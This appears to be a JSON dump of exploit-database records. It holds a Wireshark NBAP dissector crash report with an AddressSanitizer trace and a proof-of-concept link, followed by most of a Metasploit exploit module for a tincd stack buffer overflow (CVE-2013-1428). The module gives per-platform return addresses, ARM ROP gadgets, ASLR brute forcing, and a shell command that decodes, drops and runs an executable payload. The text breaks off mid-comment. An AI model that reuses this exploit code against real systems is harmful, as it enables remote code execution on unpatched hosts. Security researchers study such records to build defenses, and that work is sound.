"2016-02-04T09:17:14", "bulletinFamily": "exploit", "description": "Wireshark - dissect_nbap_MACdPDU_Size SIGSEGV. CVE-2015-8730. Dos exploits for multiple platform", "modified": "2015-12-16T00:00:00", "published": "2015-12-16T00:00:00", "id": "EDB-ID:38999", "href": "https://www.exploit-db.com/exploits/38999/", "type": "exploitdb", "title": "Wireshark - dissect_nbap_MACdPDU_Size SIGSEGV", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=652\r\n\r\nThe following SIGSEGV crash due to an invalid memory read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n\r\n--- cut ---\r\n==31034==ERROR: AddressSanitizer: SEGV on unknown address 0x7fc24e20fa84 (pc 0x7fbe445bb082 bp 0x7fff030fefb0 sp 0x7fff030fef00 T0)\r\n #0 0x7fbe445bb081 in dissect_nbap_MACdPDU_Size wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1622:79\r\n #1 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12\r\n #2 0x7fbe445c760d in dissect_nbap_HSDSCH_Initial_Capacity_AllocationItem wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1650:12\r\n #3 0x7fbe433b2fa3 in dissect_per_sequence_of_helper wireshark/epan/dissectors/packet-per.c:531:10\r\n #4 0x7fbe433be23b in dissect_per_constrained_sequence_of wireshark/epan/dissectors/packet-per.c:905:9\r\n #5 0x7fbe445c7569 in dissect_nbap_HSDSCH_Initial_Capacity_Allocation wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1663:12\r\n #6 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12\r\n #7 0x7fbe445da43d in dissect_nbap_CommonMACFlow_Specific_InfoItem_Response wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1682:12\r\n #8 0x7fbe433b2fa3 in dissect_per_sequence_of_helper wireshark/epan/dissectors/packet-per.c:531:10\r\n #9 0x7fbe433be23b in dissect_per_constrained_sequence_of wireshark/epan/dissectors/packet-per.c:905:9\r\n #10 0x7fbe445da399 in dissect_nbap_CommonMACFlow_Specific_InfoList_Response wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1695:12\r\n #11 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12\r\n #12 0x7fbe445da2bd in dissect_nbap_HSDSCH_Common_System_Information_ResponseFDD wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:2120:12\r\n #13 0x7fbe44546230 in dissect_HSDSCH_Common_System_Information_ResponseFDD_PDU wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:2430:12\r\n #14 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #15 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #16 0x7fbe41b35dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9\r\n #17 0x7fbe4456f40e in dissect_ProtocolExtensionFieldExtensionValue wireshark/epan/dissectors/../../asn1/nbap/packet-nbap-template.c:320:11\r\n #18 0x7fbe433addf0 in dissect_per_open_type_internal wireshark/epan/dissectors/packet-per.c:242:5\r\n #19 0x7fbe433ae10d in dissect_per_open_type_pdu_new wireshark/epan/dissectors/packet-per.c:263:9\r\n #20 0x7fbe4456f370 in dissect_nbap_T_extensionValue wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:200:12\r\n #21 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12\r\n #22 0x7fbe4456f12d in dissect_nbap_ProtocolExtensionField wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:215:12\r\n #23 0x7fbe433b2fa3 in dissect_per_sequence_of_helper wireshark/epan/dissectors/packet-per.c:531:10\r\n #24 0x7fbe433be23b in dissect_per_constrained_sequence_of wireshark/epan/dissectors/packet-per.c:905:9\r\n #25 0x7fbe4456ef09 in dissect_nbap_ProtocolExtensionContainer wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:228:12\r\n #26 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12\r\n #27 0x7fbe445f23bf in dissect_nbap_CommonMeasurementInitiationRequest wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:263:12\r\n #28 0x7fbe445644d0 in dissect_CommonMeasurementInitiationRequest_PDU wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:5030:12\r\n #29 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #30 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #31 0x7fbe41b3802d in dissector_try_string wireshark/epan/packet.c:1443:9\r\n #32 0x7fbe4456e3ce in dissect_InitiatingMessageValue wireshark/epan/dissectors/../../asn1/nbap/packet-nbap-template.c:326:11\r\n #33 0x7fbe433addf0 in dissect_per_open_type_internal wireshark/epan/dissectors/packet-per.c:242:5\r\n #34 0x7fbe433ae10d in dissect_per_open_type_pdu_new wireshark/epan/dissectors/packet-per.c:263:9\r\n #35 0x7fbe4456df10 in dissect_nbap_InitiatingMessage_value wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:702:12\r\n #36 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12\r\n #37 0x7fbe4456d91d in dissect_nbap_InitiatingMessage wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:719:12\r\n #38 0x7fbe433cc861 in dissect_per_choice wireshark/epan/dissectors/packet-per.c:1714:13\r\n #39 0x7fbe4456d881 in dissect_nbap_NBAP_PDU wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:825:12\r\n #40 0x7fbe4456d740 in dissect_NBAP_PDU_PDU wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:8430:12\r\n #41 0x7fbe444e889b in dissect_nbap wireshark/epan/dissectors/../../asn1/nbap/packet-nbap-template.c:457:9\r\n #42 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #43 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #44 0x7fbe41b35dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9\r\n #45 0x7fbe4378f98b in dissect_payload wireshark/epan/dissectors/packet-sctp.c:2517:9\r\n #46 0x7fbe43786b88 in dissect_data_chunk wireshark/epan/dissectors/packet-sctp.c:3443:16\r\n #47 0x7fbe4377fd99 in dissect_sctp_chunk wireshark/epan/dissectors/packet-sctp.c:4360:14\r\n #48 0x7fbe4377cd03 in dissect_sctp_chunks wireshark/epan/dissectors/packet-sctp.c:4515:9\r\n #49 0x7fbe4377acdf in dissect_sctp_packet wireshark/epan/dissectors/packet-sctp.c:4678:3\r\n #50 0x7fbe43778cba in dissect_sctp wireshark/epan/dissectors/packet-sctp.c:4732:3\r\n #51 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #52 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #53 0x7fbe41b35dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9\r\n #54 0x7fbe428455f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11\r\n #55 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #56 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #57 0x7fbe41b402be in call_dissector_only wireshark/epan/packet.c:2662:8\r\n #58 0x7fbe41b31ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8\r\n #59 0x7fbe41b3133b in dissect_record wireshark/epan/packet.c:501:3\r\n #60 0x7fbe41adf3c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2\r\n #61 0x5264eb in process_packet wireshark/tshark.c:3728:5\r\n #62 0x51f960 in load_cap_file wireshark/tshark.c:3484:11\r\n #63 0x515daf in main wireshark/tshark.c:2197:13\r\n\r\nAddressSanitizer can not provide additional info.\r\nSUMMARY: AddressSanitizer: SEGV wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1622:79 in dissect_nbap_MACdPDU_Size\r\n==31034==ABORTING\r\n--- cut ---\r\n\r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11815. Attached are three files which trigger the crash.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38999.zip\r\n\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/38999/"}, {"lastseen": "2016-02-04T01:18:22", "bulletinFamily": "exploit", "description": "Tincd Post-Authentication Remote TCP Stack Buffer Overflow. CVE-2013-1428. Remote exploits for multiple platform", "modified": "2014-12-02T00:00:00", "published": "2014-12-02T00:00:00", "id": "EDB-ID:35441", "href": "https://www.exploit-db.com/exploits/35441/", "type": "exploitdb", "title": "Tincd Post-Authentication Remote TCP Stack Buffer Overflow", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'securerandom'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = AverageRanking\r\n\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::Remote::TincdExploitClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Tincd Post-Authentication Remote TCP Stack Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a stack buffer overflow in Tinc's tincd\r\n service. After authentication, a specially crafted tcp packet (default port 655)\r\n leads to a buffer overflow and allows to execute arbitrary code. This module has\r\n been tested with tinc-1.1pre6 on Windows XP (custom calc payload) and Windows 7\r\n (windows/meterpreter/reverse_tcp), and tinc version 1.0.19 from the ports of\r\n FreeBSD 9.1-RELEASE # 0 and various other OS, see targets. The exploit probably works\r\n for all versions <= 1.1pre6.\r\n A manually compiled version (1.1.pre6) on Ubuntu 12.10 with gcc 4.7.2 seems to\r\n be a non-exploitable crash due to calls to __memcpy_chk depending on how tincd\r\n was compiled. Bug got fixed in version 1.0.21/1.1pre7. While writing this module\r\n it was recommended to the maintainer to start using DEP/ASLR and other protection\r\n mechanisms.\r\n },\r\n 'Author' =>\r\n [\r\n # PoC changes (mostly reliability), port python to ruby, exploitation including ROP, support for all OS, metasploit module\r\n 'Tobias Ospelt <tobias[at]modzero.ch>', # @floyd_ch\r\n # original finding, python PoC crash\r\n 'Martin Schobert <schobert[at]modzero.ch>' # @nitram2342\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2013-1428'],\r\n ['OSVDB', '92653'],\r\n ['BID', '59369'],\r\n ['URL', 'http://www.floyd.ch/?p=741'],\r\n ['URL', 'http://sitsec.net/blog/2013/04/22/stack-based-buffer-overflow-in-the-vpn-software-tinc-for-authenticated-peers/'],\r\n ['URL', 'http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2013-1428']\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'process'\r\n },\r\n 'Payload' =>\r\n {\r\n 'Space' => 1675,\r\n 'DisableNops' => true\r\n },\r\n 'Privileged' => true,\r\n 'Targets' =>\r\n [\r\n # full exploitation x86:\r\n ['Windows XP x86, tinc 1.1.pre6 (exe installer)', { 'Platform' => 'win', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],\r\n ['Windows 7 x86, tinc 1.1.pre6 (exe installer)', { 'Platform' => 'win', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],\r\n ['FreeBSD 9.1-RELEASE # 0 x86, tinc 1.0.19 (ports)', { 'Platform' => 'bsd', 'Ret' => 0x0804BABB, 'offset' => 1676 }],\r\n ['Fedora 19 x86 ROP (NX), write binary to disk payloads, tinc 1.0.20 (manual compile)', {\r\n 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Ret' => 0x4d10ee87, 'offset' => 1676 }\r\n ],\r\n ['Fedora 19 x86 ROP (NX), CMD exec payload, tinc 1.0.20 (manual compile)', {\r\n 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Ret' => 0x4d10ee87, 'offset' => 1676 }\r\n ],\r\n ['Archlinux 2013.04.01 x86, tinc 1.0.20 (manual compile)', { 'Platform' => 'linux', 'Ret' => 0x08065929, 'offset' => 1676 }],\r\n ['OpenSuse 11.2 x86, tinc 1.0.20 (manual compile)', { 'Platform' => 'linux', 'Ret' => 0x0804b07f, 'offset' => 1676 }],\r\n # full exploitation ARM:\r\n ['Pidora 18 ARM ROP(NX)/ASLR brute force, write binary to disk payloads, tinc 1.0.20 (manual compile with restarting daemon)', {\r\n 'Platform' => 'linux', 'Arch' => ARCH_ARMLE, 'Ret' => 0x00015cb4, 'offset' => 1668 }\r\n ],\r\n ['Pidora 18 ARM ROP(NX)/ASLR brute force, CMD exec payload, tinc 1.0.20 (manual compile with restarting daemon)', {\r\n 'Platform' => 'linux', 'Arch' => ARCH_CMD, 'Ret' => 0x00015cb4, 'offset' => 1668 }\r\n ],\r\n # crash only:\r\n ['Crash only: Ubuntu 12.10 x86, tinc 1.1.pre6 (apt-get or manual compile)', { 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],\r\n ['Crash only: Fedora 16 x86, tinc 1.0.19 (yum)', { 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],\r\n ['Crash only: OpenSuse 11.2 x86, tinc 1.0.16 (rpm package)', { 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],\r\n ['Crash only: Debian 7.3 ARM, tinc 1.0.19 (apt-get)', { 'Platform' => 'linux', 'Ret' => 0x9000, 'offset' => 1668 }]\r\n ],\r\n 'DisclosureDate' => 'Apr 22 2013', # finding, msf module: Dec 2013\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [ # Only for shellcodes that write binary to disk\r\n # Has to be short, usually either . or /tmp works\r\n # /tmp could be mounted as noexec\r\n # . is usually only working if tincd is running as root\r\n OptString.new('BINARY_DROP_LOCATION', [false, 'Short location to drop executable on server, usually /tmp or .', '/tmp']),\r\n OptInt.new('BRUTEFORCE_TRIES', [false, 'How many brute force tries (ASLR brute force)', 200]),\r\n OptInt.new('WAIT', [false, 'Waiting time for server daemon restart (ASLR brute force)', 3])\r\n ], self\r\n )\r\n end\r\n\r\n def exploit\r\n # #\r\n # x86\r\n # #\r\n # WINDOWS XP and 7 full exploitation\r\n # Simple, we only need some mona.py magic\r\n # C:\\Program Files\\tinc>\"C:\\Program Files\\Immunity Inc\\Immunity Debugger\\ImmunityDebugger.exe\" \"C:\\Program Files\\tinc\\tincd.exe -D -d 5\"\r\n # !mona config -set workingfolder c:\\logs\\%p\r\n # !mona pc 1682\r\n # --> C:\\logs\\tincd\\pattern\r\n # !mona findmsp\r\n # Straight forward, when we overwrite EIP the second value\r\n # on the stack is pointing to our payload.\r\n # !mona findwild -o -type instr -s \"pop r32# ret\"\r\n\r\n # FREEBSD full exploitation\r\n # Same offset as windows, same exploitation method\r\n # But we needed a new pop r32# ret for the freebsd version\r\n # No mona.py help on bsd or linux so:\r\n # - Dumped .text part of tincd binary in gdb\r\n # - Search in hex editor for opcodes for \"pop r32# ret\":\r\n # 58c3, 59c3, ..., 5fc3\r\n # - Found a couple of 5dc3. ret = start of .text + offset in hex editor\r\n # - 0x0804BABB works very well\r\n\r\n # UBUNTU crash only\r\n # Manually compiled version (1.1.pre6) on Ubuntu 12.10 with gcc 4.7.2 seems to be a non-exploitable crash, because\r\n # the bug is in a fixed size (MAXSIZE) struct member variable. The size of the destination is known\r\n # at compile time. gcc is introducing a call to __memcpy_chk:\r\n # http://gcc.gnu.org/svn/gcc/branches/cilkplus/libssp/memcpy-chk.c\r\n # memcpy_chk does a __chk_fail call if the destination buffer is smaller than the source buffer. Therefore it will print\r\n # *** buffer overflow detected *** and terminate (SIGABRT). The same result for tincd 10.0.19 which can be installed\r\n # from the repository. It might be exploitable for versions compiled with an older version of gcc.\r\n # memcpy_chk seems to be in gcc since 2005:\r\n # http://gcc.gnu.org/svn/gcc/branches/cilkplus/libssp/memcpy-chk.c\r\n # http://gcc.gnu.org/git/?p=gcc.git;a=history;f=libssp/memcpy-chk.c;hb=92920cc62318e5e8b6d02d506eaf66c160796088\r\n\r\n # OPENSUSE\r\n # OpenSuse 11.2\r\n # Installation as described on the tincd website. For 11.2 there are two versions.\r\n # Decided for 1.0.16 as this is a vulnerable version\r\n # wget \"http://download.opensuse.org/repositories/home:/seilerphilipp/SLE_11_SP2/i586/tinc-1.0.16-3.1.i586.rpm\"\r\n # rpm -i tinc-1.0.16-3.1.i586.rpm\r\n # Again, strace shows us that the buffer overflow was detected (see Ubuntu)\r\n # writev(2, [{\"*** \", 4}, {\"buffer overflow detected\", 24}, {\" ***: \", 6}, {\"tincd\", 5}, {\" terminated\\n\", 12}], 5) = 51\r\n # So a crash-only non-exploitable bof here. So let's go for manual install:\r\n # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'\r\n # yast -i gcc zlib zlib-devel && echo \"yast is still ugly\" && zypper install lzo-devel libopenssl-devel make && make && make install\r\n # Exploitable. Let's see:\r\n # tincd is mapped at 0x8048000. There is a 5d3c at offset 307f in the tincd binary. this means:\r\n # the offset to pop ebp; ret is 0x0804b07f\r\n\r\n # FEDORA\r\n # Fedora 16\r\n # yum has version 1.0.19\r\n # yum install tinc\r\n # Non-exploitable crash, see Ubuntu. Strace tells us:\r\n # writev(2, [{\"*** \", 4}, {\"buffer overflow detected\", 24}, {\" ***: \", 6}, {\"tincd\", 5}, {\" terminated\\n\", 12}], 5) = 51\r\n # About yum: Fedora 17 has fixed version 1.0.21, Fedora 19 fixed version 1.0.23\r\n # Manual compile went on with Fedora 19\r\n # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'\r\n # yum install gcc zlib-devel.i686 lzo-devel.i686 openssl-devel.i686 && ./configure && make && make install\r\n # Don't forget to stop firewalld for testing, as the port is still closed otherwise\r\n # # hardening-check tincd\r\n # tincd:\r\n # Position Independent Executable: no, normal executable!\r\n # Stack protected: no, not found!\r\n # Fortify Source functions: no, only unprotected functions found!\r\n # Read-only relocations: yes\r\n # Immediate binding: no, not found!\r\n # Running this module with target set to Windows:\r\n # Program received signal SIGSEGV, Segmentation fault.\r\n # 0x0041caa6 in ?? ()\r\n # well and that's our windows offset...\r\n # (gdb) info proc mappings\r\n # 0x8048000 0x8068000 0x20000 0x0 /usr/local/sbin/tincd\r\n # After finding a normal 5DC3 (pop ebp# ret) at offset 69c3 of the binary we\r\n # can try to execute the payload on the stack, but:\r\n # (gdb) stepi\r\n # Program received signal SIGSEGV, Segmentation fault.\r\n # 0x08e8ee08 in ?? ()\r\n # Digging deeper we find:\r\n # dmesg | grep protection\r\n # [ 0.000000] NX (Execute Disable) protection: active\r\n # or:\r\n # # objdump -x /usr/local/sbin/tincd\r\n # [...] STACK off 0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**4\r\n # filesz 0x00000000 memsz 0x00000000 flags rw-\r\n # or: https://bugzilla.redhat.com/show_bug.cgi?id=996365\r\n # Time for ROP\r\n # To start the ROP we need a POP r32# POP ESP# RET (using the first four bytes of the shellcode\r\n # as a pointer to instructions). Was lucky after some searching:\r\n # (gdb) x/10i 0x4d10ee87\r\n # 0x4d10ee87: pop %ebx\r\n # 0x4d10ee88: mov $0xf5d299dd,%eax\r\n # 0x4d10ee8d: rcr %cl,%al\r\n # 0x4d10ee8f: pop %esp\r\n # 0x4d10ee90: ret\r\n\r\n # ARCHLINUX\r\n # archlinux-2013.04.01 pacman has fixed version 1.0.23, so went for manual compile:\r\n # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'\r\n # pacman -S gcc zlib lzo openssl make && ./configure && make && make install\r\n # Offset in binary to 58c3: 0x1D929 + tincd is mapped at starting address 0x8048000\r\n # -->Ret: 0x8065929\r\n # No NX protection, it simply runs the shellcode :)\r\n\r\n # #\r\n # ARM\r\n # #\r\n # ARM Pidora 18 (Raspberry Pi Fedora Remix) on a physical Raspberry Pi\r\n # Although this is more for the interested reader, as Pidora development\r\n # already stopped... Raspberry Pi's are ARM1176JZF-S (700 MHz) CPUs\r\n # meaning it's an ARMv6 architecture\r\n # yum has fixed version 1.0.21, so went for manual compile:\r\n # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'\r\n # yum install gdb gcc zlib-devel lzo-devel openssl-devel && ./configure && make && make install\r\n # Is the binary protected?\r\n # wget \"http://www.trapkit.de/tools/checksec.sh\" && chmod +x checksec.sh\r\n # # ./checksec.sh --file /usr/local/sbin/tincd\r\n # RELRO STACK CANARY NX PIE RPATH RUNPATH FILE\r\n # No RELRO No canary found NX enabled No PIE No RPATH No RUNPATH /usr/local/sbin/tincd\r\n # so again NX... but what about the system things?\r\n # cat /proc/sys/kernel/randomize_va_space\r\n # 2\r\n # --> \"Randomize the positions of the stack, VDSO page, shared memory regions, and the data segment.\r\n # This is the default setting.\"\r\n # Here some examples of the address of the system function:\r\n # 0xb6c40848\r\n # 0xb6cdd848\r\n # 0xb6c7c848\r\n # Looks like we would have to brute force one byte\r\n # (gdb) info proc mappings\r\n # 0x8000 0x23000 0x1b000 0 /usr/local/sbin/tincd\r\n # 0x2b000 0x2c000 0x1000 0x1b000 /usr/local/sbin/tincd\r\n # When we exploit we get the following:\r\n # Program received signal SIGSEGV, Segmentation fault.\r\n # 0x90909090 in ?? ()\r\n # ok, finally a different offset to eip. Let's figure it out:\r\n # $ tools/pattern_create.rb 1676\r\n # Ok, pretty close, it's 1668. If we randomly choose ret as 0x9000 we get:\r\n # (gdb) break *0x9000\r\n # Breakpoint 1 at 0x9000\r\n # See that our shellcode is *on* the stack:\r\n # (gdb) x/10x $sp\r\n # 0xbee14308: 0x00000698 0x00000000 0x00000000 0x00000698\r\n # 0xbee14318: 0x31203731 0x0a323736 0xe3a00002 0xe3a01001 <-- 0xe3a00002 is the start of our shellcode\r\n # 0xbee14328: 0xe3a02006 0xe3a07001\r\n # let's explore the code we can reuse:\r\n # (gdb) info functions\r\n # objdump -d /usr/local/sbin/tincd >assembly.txt\r\n # while simply searching for the bx instruction we were not very lucky,\r\n # but searching for some \"pop pc\" it's easy to find nice gadgets.\r\n # we can write arguments to the .data section again:\r\n # 0x2b3f0->0x2b4ac at 0x0001b3f0: .data ALLOC LOAD DATA HAS_CONTENTS\r\n # The problem is we can not reliably forecast the system function's address, but it's\r\n # only one byte random, therefore we have to brute force it and/or find a memory leak.\r\n # Let's assume it's a restarting daemon:\r\n # create /etc/systemd/system/tincd.service and fill in Restart=restart-always\r\n\r\n # ARM Debian Wheezy on qemu\r\n # root@debian:~# apt-cache showpkg tinc\r\n # Package: tinc\r\n # Versions:\r\n # 1.0.19-3 (/var/lib/apt/lists/ftp.halifax.rwth-aachen.de_debian_dists_wheezy_main_binary-armhf_Packages)\r\n # nice, that's vulnerable\r\n # apt-get install tinc\r\n # apt-get install elfutils && ln -s /usr/bin/eu-readelf /usr/bin/readelf\r\n # wget \"http://www.trapkit.de/tools/checksec.sh\" && chmod +x checksec.sh\r\n # # ./checksec.sh --file /usr/sbin/tincd\r\n # RELRO STACK CANARY NX PIE RPATH RUNPATH FILE\r\n # Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH /usr/sbin/tincd\r\n # Puh, doesn't look too good for us, NX enabled, Stack canary present and a partial RELRO, I'm not going to cover this one here\r\n\r\n packet_payload = payload.encoded\r\n # Pidora and Fedora/ROP specific things\r\n if target.name =~ /Pidora 18/ || target.name =~ /Fedora 19/\r\n rop_generator = nil\r\n filename = rand_text_alpha(1)\r\n cd = \"cd #{datastore['BINARY_DROP_LOCATION']};\"\r\n cd = '' if datastore['BINARY_DROP_LOCATION'] == '.'\r\n\r\n if target.name =~ /Pidora 18/\r\n print_status('Using ROP and brute force ASLR guesses to defeat NX/ASLR on ARMv6 based Pidora 18')\r\n print_status('This requires a restarting tincd daemon!')\r\n print_status('Warning: This is likely to get tincd into a state where it doesn\\'t accept connections anymore')\r\n rop_generator = method(:create_pidora_rop)\r\n elsif target.name =~ /Fedora 19/\r\n print_status('Using ROP to defeat NX on Fedora 19')\r\n rop_generator = method(:create_fedora_rop)\r\n end\r\n\r\n if target.arch.include? ARCH_CMD\r\n # The CMD payloads are a bit tricky on Fedora. As of december 2013\r\n # some of the generic unix payloads (e.g. reverse shell with awk) don't work\r\n # (even when executed directly in a terminal on Fedora)\r\n # use generic/custom and specify PAYLOADSTR without single quotes\r\n # it's usually sh -c *bla*\r\n packet_payload = create_fedora_rop(payload.encoded.split(' ', 3))\r\n else\r\n # the binary drop payloads\r\n packet_payload = get_cmd_binary_drop_payload(filename, cd, rop_generator)\r\n if packet_payload.length > target['offset']\r\n print_status(\"Plain version too big (#{packet_payload.length}, max. #{target['offset']}), trying zipped version\")\r\n packet_payload = get_gzip_cmd_binary_drop_payload(filename, cd, rop_generator)\r\n vprint_status(\"Achieved version with #{packet_payload.length} bytes\")\r\n end\r\n end\r\n end\r\n\r\n if packet_payload.length > target['offset']\r\n fail_with(Exploit::Failure::BadConfig, \"The resulting payload has #{packet_payload.length} bytes, we only have #{target['offset']} space.\")\r\n end\r\n injection = packet_payload + rand_text_alpha(target['offset'] - packet_payload.length) + [target.ret].pack('V')\r\n\r\n vprint_status(\"Injection starts with #{injection.unpack('H*')[0][0..30]}...\")\r\n\r\n if target.name =~ /Pidora 18/\r\n # we have to brute force to defeat ASLR\r\n datastore['BRUTEFORCE_TRIES'].times do\r\n print_status(\"Try #{n}: Initializing tinc exploit client (setting up ciphers)\")\r\n setup_ciphers\r\n print_status('Telling tinc exploit client to connect, handshake and send the payload')\r\n begin\r\n send_recv(injection)\r\n rescue RuntimeError, Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, ::Timeout::Error, ::EOFError => runtime_error\r\n print_error(runtime_error.message)\r\n print_error(runtime_error.backtrace.join(\"\\n\\t\"))\r\n rescue Rex::ConnectionRefused\r\n print_error('Server refused connection. Is this really a restarting daemon? Try higher WAIT option.')\r\n sleep(3)\r\n next\r\n end\r\n secs = datastore['WAIT']\r\n print_status(\"Waiting #{secs} seconds for server to restart daemon (which will change the ASLR byte)\")\r\n sleep(secs)\r\n end\r\n print_status(\"Brute force with #{datastore['BRUTEFORCE_TRIES']} tries done. If not successful you could try again.\")\r\n else\r\n # Setup local ciphers\r\n print_status('Initializing tinc exploit client (setting up ciphers)')\r\n setup_ciphers\r\n # The tincdExploitClient will do the crypto handshake with the server and\r\n # send the injection (a packet), where the actual buffer overflow is triggered\r\n print_status('Telling tinc exploit client to connect, handshake and send the payload')\r\n send_recv(injection)\r\n end\r\n print_status('Exploit finished')\r\n end\r\n\r\n def get_cmd_binary_drop_payload(filename, cd, rop_generator)\r\n elf_base64 = Rex::Text.encode_base64(generate_payload_exe)\r\n cmd = ['/bin/sh', '-c', \"#{cd}echo #{elf_base64}|base64 -d>#{filename};chmod +x #{filename};./#{filename}\"]\r\n vprint_status(\"You will try to execute #{cmd.join(' ')}\")\r\n rop_generator.call(cmd)\r\n end\r\n\r\n def get_gzip_cmd_binary_drop_payload(filename, cd, rop_generator)\r\n elf_zipped_base64 = Rex::Text.encode_base64(Rex::Text.gzip(generate_payload_exe))\r\n cmd = ['/bin/sh', '-c', \"#{cd}echo #{elf_zipped_base64}|base64 -d|gunzip>#{filename};chmod +x #{filename};./#{filename}\"]\r\n vprint_status(\"You will try to execute #{cmd.join(' ')}\")\r\n rop_generator.call(cmd)\r\n end\r\n\r\n def create_pidora_rop(sys_execv_args)\r\n sys_execv_args = sys_execv_args.join(' ')\r\n sys_execv_args += \"\\x00\"\r\n\r\n aslr_byte_guess = SecureRandom.random_bytes(1).ord\r\n print_status(\"Using 0x#{aslr_byte_guess.to_s(16)} as random byte for ASLR brute force (hope the server will use the same at one point)\")\r\n\r\n # Gadgets tincd\r\n # c714:\te1a00004 \tmov\tr0, r4\r\n # c718:\te8bd8010 \tpop\t{r4, pc}\r\n mov_r0_r4_pop_r4_ret = [0x0000c714].pack('V')\r\n pop_r4_ret = [0x0000c718].pack('V')\r\n # 1cef4:\te580400c \tstr\tr4, [r0, #12]\r\n # 1cef8:\te8bd8010 \tpop\t{r4, pc}\r\n # mov_r0_plus_12_to_r4_pop_r4_ret = [0x0001cef4].pack('V')\r\n\r\n # bba0:\te5843000 \tstr\tr3, [r4]\r\n # bba4:\te8bd8010 \tpop\t{r4, pc}\r\n mov_to_r4_addr_pop_r4_ret = [0x0000bba0].pack('V')\r\n\r\n # 13ccc:\te1a00003 \tmov\tr0, r3\r\n # 13cd0:\te8bd8008 \tpop\t{r3, pc}\r\n pop_r3_ret = [0x00013cd0].pack('V')\r\n\r\n # address to start rop (removing 6 addresses of garbage from stack)\r\n # 15cb4:\te8bd85f0 \tpop\t{r4, r5, r6, r7, r8, sl, pc}\r\n # start_rop = [0x00015cb4].pack('V')\r\n # see target Ret\r\n\r\n # system function address base to brute force\r\n # roughly 500 tests showed addresses between\r\n # 0xb6c18848 and 0xb6d17848 (0xff distance)\r\n system_addr = [0xb6c18848 + (aslr_byte_guess * 0x1000)].pack('V')\r\n\r\n # pointer into .data section\r\n loc_dot_data = 0x0002b3f0 # a location inside .data\r\n\r\n # Rop into system(), prepare address of payload in r0\r\n rop = ''\r\n\r\n # first, let's put the payload into the .data 